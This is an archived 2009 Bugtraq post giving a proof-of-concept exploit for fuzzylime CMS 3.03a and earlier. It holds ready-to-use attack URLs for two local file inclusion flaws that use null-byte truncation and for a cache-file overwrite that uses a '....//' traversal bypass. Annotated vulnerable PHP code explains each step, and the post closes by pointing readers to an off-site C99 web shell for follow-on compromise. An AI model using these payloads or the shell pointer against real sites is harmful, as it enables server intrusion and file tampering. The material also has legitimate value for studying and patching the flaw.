lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090621190517.28494.qmail@securityfocus.com>
Date: 21 Jun 2009 19:05:17 -0000
From: ceza_fuat_kolik@...mail.com
To: bugtraq@...urityfocus.com
Subject: fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File
 Corruption PoC

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker | 
+-----------+---------------------+
 Author :  xhaxkerx
 Special Thankz : yasin
 site : http://www.c99.mobi
+---------------------------------+    


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
 1. <?
 2. @extract($HTTP_GET_VARS);  <-------- {1} 
 3. @extract($_GET);           <----------^
      
27.  elseif(isset($e)) { <------- {2}
28.       $filename = "code/mailing/$list.inc.php"; <------- {3}
29.        @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() allows to overwrite any not-defined variable via get  
   therefore it works regardless of register_globals settings.
       
2. $e is a variable not defined,therefore become $_GET['e']     
3. $list is a variable not defined,therefore become $_GET['list']
4. $filename contains $list variable that will be required
-----------------------------------------------------------------


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings 
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
  1. <?
  2. $s = $_GET[s];
  3. $p = $_GET[p];
  4. $s = str_replace("../", "", $s); <---------- {1}
  5. $p = str_replace("../", "", $p);
 ...
 54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101.		if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102.			$output = ob_get_contents();
103.			fputs($handle, $output); 
104.
105.			fclose($handle); 
106.		} 
107.	}
----------------------------------------------------------------------
1. you have to use ....// to change directory because of 1st point. so
   ....// will be ../
2. $cachefile contains $s variable
3. if $usecache == 1 we will go ahead
4. you will overwrite a file typing the name via $s variable.
-----------------------------------------------------------------------  
 if you need shell http://www.c99.mobi/c99.txt


[x] http://www.youtube.com/watch?v=h3DQmJOkSY0

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ